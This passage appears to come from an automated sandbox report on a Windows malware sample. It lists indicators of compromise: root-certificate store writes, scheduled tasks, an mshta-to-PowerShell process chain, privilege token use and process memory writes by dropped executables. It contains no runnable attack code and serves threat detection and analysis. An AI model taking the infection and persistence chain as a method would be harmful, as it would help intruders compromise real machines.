description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 11 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a cuFIzyH.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 P2SXMuh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 6z1l5Yn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd 6z1l5Yn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd 6z1l5Yn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd 6z1l5Yn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A 6z1l5Yn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 6z1l5Yn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 cuFIzyH.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a cuFIzyH.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a P2SXMuh.exe -
Runs ping.exe 1 TTPs 4 IoCs
pid Process 4128 PING.EXE 4876 PING.EXE 3560 PING.EXE 3412 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2824 schtasks.exe 2252 schtasks.exe 1684 schtasks.exe 2208 schtasks.exe 4728 schtasks.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 27 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 188 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2880 powershell.exe 2880 powershell.exe 2880 powershell.exe 2620 TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE 1132 rapes.exe 2480 cuFIzyH.exe 1356 powershell.exe 2960 powershell.exe 1356 powershell.exe 1356 powershell.exe 352 TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE 2732 powershell.exe 2996 powershell.exe 2824 powershell.exe 2072 powershell.exe 1100 powershell.exe 2072 powershell.exe 2072 powershell.exe 1960 483d2fa8a0d53818306efeb32d3.exe 1696 27264e0632.exe 3044 0dce80a750.exe 3044 0dce80a750.exe 3044 0dce80a750.exe 1956 chrome.exe 1956 chrome.exe 1588 d1deb9a751.exe 3360 9b50395388.exe 3360 9b50395388.exe 3044 0dce80a750.exe 3044 0dce80a750.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 3536 chrome.exe 3536 chrome.exe 3360 9b50395388.exe 3360 9b50395388.exe 3044 0dce80a750.exe 3044 0dce80a750.exe 3044 0dce80a750.exe 3044 0dce80a750.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 1356 powershell.exe Token: SeDebugPrivilege 2960 powershell.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeDebugPrivilege 2996 powershell.exe Token: SeDebugPrivilege 2824 powershell.exe Token: SeDebugPrivilege 2072 powershell.exe Token: SeDebugPrivilege 1100 powershell.exe Token: SeShutdownPrivilege 1956 chrome.exe Token: SeShutdownPrivilege 1956 chrome.exe Token: SeShutdownPrivilege 1956 chrome.exe Token: SeShutdownPrivilege 1956 chrome.exe Token: SeDebugPrivilege 764 taskkill.exe Token: SeShutdownPrivilege 1956 chrome.exe Token: SeShutdownPrivilege 1956 chrome.exe Token: SeShutdownPrivilege 1956 chrome.exe Token: SeShutdownPrivilege 1956 chrome.exe Token: SeDebugPrivilege 1936 taskkill.exe Token: SeDebugPrivilege 2172 taskkill.exe Token: SeDebugPrivilege 1224 taskkill.exe Token: SeDebugPrivilege 2692 taskkill.exe Token: SeDebugPrivilege 2612 firefox.exe Token: SeDebugPrivilege 2612 firefox.exe Token: SeShutdownPrivilege 3536 chrome.exe Token: SeShutdownPrivilege 3536 chrome.exe Token: SeDebugPrivilege 3360 9b50395388.exe Token: SeShutdownPrivilege 3536 chrome.exe Token: SeShutdownPrivilege 3536 chrome.exe Token: SeShutdownPrivilege 3536 chrome.exe Token: SeShutdownPrivilege 3536 chrome.exe Token: SeShutdownPrivilege 3536 chrome.exe Token: SeShutdownPrivilege 3536 chrome.exe Token: SeDebugPrivilege 3328 6z1l5Yn.exe Token: SeShutdownPrivilege 3536 chrome.exe Token: SeShutdownPrivilege 3536 chrome.exe Token: SeShutdownPrivilege 3536 chrome.exe Token: SeShutdownPrivilege 3536 chrome.exe Token: SeShutdownPrivilege 3536 chrome.exe Token: SeShutdownPrivilege 3536 chrome.exe Token: SeShutdownPrivilege 3536 chrome.exe Token: SeShutdownPrivilege 3536 chrome.exe Token: SeShutdownPrivilege 3536 chrome.exe Token: SeShutdownPrivilege 3536 chrome.exe Token: SeDebugPrivilege 4976 abaMpGYmAU.exe Token: SeDebugPrivilege 4528 firefox.exe Token: SeDebugPrivilege 1608 T9wBxU6hjy.exe Token: SeDebugPrivilege 4100 6z1l5Yn.exe Token: SeDebugPrivilege 4764 taskkill.exe -
Suspicious use of FindShellTrayWindow 24 IoCs
pid Process 2508 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe 2508 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe 2508 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe 2620 TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE 2276 db7e2fd40a.exe 2276 db7e2fd40a.exe 2276 db7e2fd40a.exe 1956 chrome.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 2612 firefox.exe 2612 firefox.exe 2612 firefox.exe 2612 firefox.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 3536 chrome.exe -
Suspicious use of SendNotifyMessage 20 IoCs
pid Process 2508 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe 2508 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe 2508 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe 2276 db7e2fd40a.exe 2276 db7e2fd40a.exe 2276 db7e2fd40a.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 2612 firefox.exe 2612 firefox.exe 2612 firefox.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2508 wrote to memory of 468 2508 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe 30 PID 2508 wrote to memory of 468 2508 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe 30 PID 2508 wrote to memory of 468 2508 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe 30 PID 2508 wrote to memory of 468 2508 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe 30 PID 2508 wrote to memory of 2264 2508 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe 31 PID 2508 wrote to memory of 2264 2508 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe 31 PID 2508 wrote to memory of 2264 2508 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe 31 PID 2508 wrote to memory of 2264 2508 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe 31 PID 468 wrote to memory of 2824 468 cmd.exe 33 PID 468 wrote to memory of 2824 468 cmd.exe 33 PID 468 wrote to memory of 2824 468 cmd.exe 33 PID 468 wrote to memory of 2824 468 cmd.exe 33 PID 2264 wrote to memory of 2880 2264 mshta.exe 34 PID 2264 wrote to memory of 2880 2264 mshta.exe 34 PID 2264 wrote to memory of 2880 2264 mshta.exe 34 PID 2264 wrote to memory of 2880 2264 mshta.exe 34 PID 2880 wrote to memory of 2620 2880 powershell.exe 36 PID 2880 wrote to memory of 2620 2880 powershell.exe 36 PID 2880 wrote to memory of 2620 2880 powershell.exe 36 PID 2880 wrote to memory of 2620 2880 powershell.exe 36 PID 2620 wrote to memory of 1132 2620 TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE 37 PID 2620 wrote to memory of 1132 2620 TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE 37 PID 2620 wrote to memory of 1132 2620 TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE 37 PID 2620 wrote to memory of 1132 2620 TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE 37 PID 1132 wrote to memory of 2480 1132 rapes.exe 39 PID 1132 wrote to memory of 2480 1132 rapes.exe 39 PID 1132 wrote to memory of 2480 1132 rapes.exe 39 PID 1132 wrote to memory of 2480 1132 rapes.exe 39 PID 1132 wrote to memory of 1812 1132 rapes.exe 40 PID 